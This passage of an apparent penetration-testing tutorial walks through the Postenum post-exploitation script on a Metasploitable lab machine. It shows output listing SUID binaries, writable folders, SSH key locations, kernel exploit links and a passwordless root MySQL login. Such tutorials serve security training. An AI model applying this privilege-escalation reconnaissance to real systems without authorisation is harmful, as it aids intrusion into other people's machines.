-rw-r--r-- 1 root root 102 Apr 8 2008 /etc/cron.weekly/.placeholder
-rw-r--r-- 1 root root 102 Apr 8 2008 /etc/cron.d/.placeholder
-rw-r--r-- 1 root root 586 Apr 14 2008 /etc/skel/.profile
-rw-r--r-- 1 root root 2928 Apr 14 2008 /etc/skel/.bashrc
-rw-r--r-- 1 root root 220 Apr 14 2008 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 102 Apr 8 2008 /etc/cron.daily/.placeholder
-rw-r--r-- 1 root root 102 Apr 8 2008 /etc/cron.hourly/.placeholder
-rw------- 1 root root 0 Mar 16 2010 /etc/.pwd.lock
-rw-r--r-- 1 root root 0 Jun 19 13:20 /dev/.initramfs-tools
-rw------- 1 postgres postgres 34 Jun 19 13:21 /var/run/postgresql/.s.PGSQL.5432.lock
-rw-r--r-- 1 root root 34 May 13 2012 /var/lib/python-support/python2.5/.path
-rw------- 1 postgres postgres 131 Mar 30 2010 /var/lib/postgresql/.bash_history
-rwxr-xr-x 1 www-data www-data 497 Sep 8 2010 /var/www/dvwa/.htaccess
-rwxr-xr-x 1 www-data www-data 174 Apr 11 2011 /var/www/mutillidae/.buildpath
-rwxr-xr-x 1 www-data www-data 712 Apr 11 2011 /var/www/mutillidae/.project
-rwxr-xr-x 1 www-data www-data 427 May 14 2012 /var/www/mutillidae/.htaccess
-rw-r--r-- 1 www-data www-data 118 Dec 9 2008 /var/www/phpMyAdmin/libraries/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 22 2005 /var/www/tikiwiki-old/modules/cache/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 19 2005 /var/www/tikiwiki-old/templates_c/.htaccess
-rw-r--r-- 1 www-data www-data 1598 Jun 1 2002 /var/www/twiki/bin/.htaccess.txt
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/Sandbox/.mailnotify
-rwxrwxrwx 1 www-data www-data 1436 Feb 1 2003 /var/www/twiki/data/Sandbox/.changes
-rw-r--r-- 1 www-data www-data 210 Jan 11 2003 /var/www/twiki/data/.htpasswd
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/Main/.mailnotify
-rwxrwxrwx 1 www-data www-data 3653 Apr 16 2010 /var/www/twiki/data/Main/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/Know/.mailnotify
-rwxrwxrwx 1 www-data www-data 3489 Jan 30 2003 /var/www/twiki/data/Know/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/TWiki/.mailnotify
-rwxrwxrwx 1 www-data www-data 4189 Feb 1 2003 /var/www/twiki/data/TWiki/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/_default/.mailnotify
-rwxrwxrwx 1 www-data www-data 683 Jan 30 2003 /var/www/twiki/data/_default/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/Trash/.mailnotify
-rwxrwxrwx 1 www-data www-data 767 Jan 25 2003 /var/www/twiki/data/Trash/.changes
-rw------- 1 www-data www-data 4275 Jun 19 2019 /var/www/.bash_history
-rw-rw-r-- 1 www-data www-data 66 Jan 22 2005 /var/www/tikiwiki/modules/cache/.htaccess
-rw-rw-r-- 1 www-data www-data 66 Jan 19 2005 /var/www/tikiwiki/templates_c/.htaccess
-r--r--r-- 1 root root 11 Jun 19 13:21 /tmp/.X0-lock
[+] - Check for clear-text password on /home/*
[x] Clear text password:
-rwxr-xr-x 1 msfadmin msfadmin 6936 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/passwd
[+] - The most interesting ssh files /
[x] SSH files:
-rw-r--r-- 1 root root 442 May 20 2012 /root/.ssh/known_hosts
-rw-r--r-- 1 root root 405 May 17 2010 /root/.ssh/authorized_keys
[+] - Check sticky bits, SUID and SGID
[x] SUID - 4000:
-rwsr-xr-x 1 root root 63584 Apr 14 2008 /bin/umount
-rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Apr 2 2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14 2008 /bin/mount
-rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping
-rwsr-xr-x 1 root root 26684 Dec 10 2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec 2 2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22 2007 /usr/bin/netkit-rsh
-rwsr-xr-x 1 root root 37360 Apr 2 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22 2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Apr 2 2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 Apr 2 2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 Apr 2 2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22 2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 Apr 2 2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 269256 Oct 4 2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 Dec 17 2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar 9 2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov 5 2007 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 165748 Apr 6 2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 17 2009 /usr/lib/pt_chown
[x] SGID - 2000:
-rwxr-sr-x 1 root shadow 19584 Apr 9 2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22 2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12 2007 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 76580 Apr 6 2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar 8 2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 Apr 8 2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 Apr 2 2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23 2007 /usr/bin/screen
-rwxr-sr-x 1 root shadow 16424 Apr 2 2008 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwxr-sr-x 1 root utmp 306996 Jan 2 2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14 2008 /usr/bin/wall
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18 2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18 2008 /usr/sbin/postdrop
[x] Sticky bit for folders - 1000:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxr-t 2 root postgres 4096 May 8 2010 /var/log/postgresql
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19 2019 /var/www/dav
drwxrwx--T 2 daemon daemon 4096 Mar 16 2010 /var/spool/cron/atjobs
drwxrwx--T 2 daemon daemon 4096 Feb 20 2007 /var/spool/cron/atspool
drwx-wx--T 2 root crontab 4096 Apr 8 2008 /var/spool/cron/crontabs
drwx-wx--T 2 postfix postdrop 4096 May 7 2010 /var/spool/postfix/maildrop
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix
[+] - Check for written and executable places
[x] World-writable folders - 222:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19 2019 /var/www/dav
drwxrwxrwx 2 www-data www-data 4096 Feb 1 2003 /var/www/twiki/data/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr 16 2010 /var/www/twiki/data/Main
drwxrwxrwx 2 www-data www-data 4096 Jan 30 2003 /var/www/twiki/data/Know
drwxrwxrwx 2 www-data www-data 16384 Feb 1 2003 /var/www/twiki/data/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 30 2003 /var/www/twiki/data/_default
drwxrwxrwx 2 www-data www-data 4096 Feb 1 2003 /var/www/twiki/data/Trash
drwxrwxrwx 2 www-data www-data 4096 Apr 21 2002 /var/www/twiki/pub/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr 7 2002 /var/www/twiki/pub/Main
drwxrwxrwx 3 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/Know
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
drwxrwxrwx 8 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 21 2003 /var/www/twiki/pub/TWiki/TWikiDocGraphics
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/TWikiTemplates
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/TWikiLogos
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/PreviewBackground
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/FileAttachment
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/WabiSabi
drwxrwxrwx 2 www-data www-data 4096 Dec 4 2001 /var/www/twiki/pub/Trash
drwxrwxrwx 2 www-data www-data 4096 Feb 1 2003 /var/www/twiki/pub/icn
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix
[x] World-writable files - 0002:
304795 4 -rw-rw-rw- 1 root daemon 1 Aug 8 2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
304796 4 -rw-rw-rw- 1 root daemon 1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
11265 0 srw-rw-rw- 1 root root 0 Jun 19 13:21 /dev/log
10037 0 drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
6130 0 crw-rw-rw- 1 root root Mar 16 2010 /dev/null
5082 0 crw-rw-rw- 1 root tty Jun 19 13:20 /dev/ttyzf
...
[+] - Check for readable logfiles owned by root
[x] World-readable logfiles - 0004:
-rw-r--r-- 1 root root 88953 Jul 5 2018 /var/log/dpkg.log
-rw-r--r-- 1 root root 5376 Jun 19 13:22 /var/log/wtmp
-rw-r--r-- 1 root root 96 Mar 16 2010 /var/log/installer/lsb-release
-rw-r--r-- 1 root root 0 Mar 16 2010 /var/log/installer/initial-status.gz
-rw-r--r-- 1 root root 58721 Mar 16 2010 /var/log/installer/status
-rw-r--r-- 1 root root 46866 Mar 16 2010 /var/log/installer/hardware-summary
-rw-r--r-- 1 root adm 16950 Jun 19 13:41 /var/log/dmesg.0
-rw-r--r-- 1 root root 292114 Jun 19 13:20 /var/log/udev
-rw-r--r-- 1 root adm 6419 Jun 19 13:52 /var/log/dmesg.4.gz
-rw-r--r-- 1 root adm 6405 Jun 19 13:21 /var/log/dmesg.3.gz
-rw-r--r-- 1 root news 0 Mar 16 2010 /var/log/news/news.crit
-rw-r--r-- 1 root news 0 Mar 16 2010 /var/log/news/news.notice
-rw-r--r-- 1 root news 0 Mar 16 2010 /var/log/news/news.err
-rw-r--r-- 1 root root 0 May 20 2012 /var/log/boot
-rw-r--r-- 1 root adm 6446 Jun 19 13:20 /var/log/dmesg.2.gz
-rw-r--r-- 1 root root 0 May 20 2012 /var/log/btmp
-rw-r--r-- 1 root adm 6414 Jun 19 13:21 /var/log/dmesg.1.gz
-rw-r--r-- 1 root root 292292 Jun 19 13:22 /var/log/lastlog
-rw-r--r-- 1 root adm 16992 Jun 19 13:21 /var/log/dmesg
[+] - List NFS shares and permisisons
[x] NFS:
-rw-r--r-- 1 root root 367 May 13 2012 /etc/exports
It begins by checking for any interesting files located in standard web server directories. Next, it looks for hidden files, SSH files, and any clear text passwords in the home directories. It will then check for SUID, SGID, and sticky bits. Finally, it looks for any writable and executable directories and includes any NFS shares that are present on the system.
Phase 9: OS Info & Kernel Exploits
The next option we'll look at will give us information pertaining to the operating system and will suggest any relevant kernel exploits that could potentially be used to escalate privileges and get root. Use the -o switch for this:
target:/var/tmp$ ./postenum.sh -o
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[x] The current user:
www-data
[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"
[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008
[+] - Exploits
[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616
The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24
First, it will give us the current user and group information. It will then show us the distribution name and release number, followed by the kernel version and information about how the kernel was compiled. Next, it lists possible exploits based on the kernel version along with links to their Exploit Database pages.
Finally, there is one last option for Postenum — the ability to run all these options at once. Use the -a switch for this one:
target:/var/tmp$ ./postenum.sh -a
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[x] The current user:
www-data
[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"
[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008
[+] - Exploits
[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616
The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24
[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x 2 root root 4096 Jul 5 2018 cron.d
drwxr-xr-x 2 root root 4096 Apr 28 2010 cron.daily
drwxr-xr-x 2 root root 4096 Mar 16 2010 cron.hourly
drwxr-xr-x 2 root root 4096 Apr 28 2010 cron.monthly
drwxr-xr-x 2 root root 4096 Mar 16 2010 cron.weekly
-rw-r--r-- 1 root root 724 Apr 8 2008 crontab
[x] List /etc/cron.d/
-rw-r--r-- 1 root root 507 May 3 2012 php5
-rw-r--r-- 1 root root 1323 Mar 31 2008 postgresql-common
...
[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen
[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license
Server version 5.0.51a-3ubuntu5
Protocol version 10
Connection Localhost via UNIX socket
UNIX socket /var/run/mysqld/mysqld.sock
Uptime: 41 min 2 sec
Threads: 2 Questions: 447 Slow queries: 0 Opens: 420 Flush tables: 1 Open tables: 64 Queries per second avg: 0.182
Be aware, this one can take some time since it runs all the options and gathers a lot of information.
Wrapping Up
Today, we learned how to use Postenum, a tool used to gather vital information during the post-exploitation phase. We first compromised the target and transferred the script from our machine. Then, we went over the various options Postenum provides, including gathering network and service information, exciting files, software versions, and other useful data that could ultimately be used for privilege escalation.
Cover image by Vitaly Vlasov/Pexels
Comments
No Comments Exist
Be the first, drop a comment!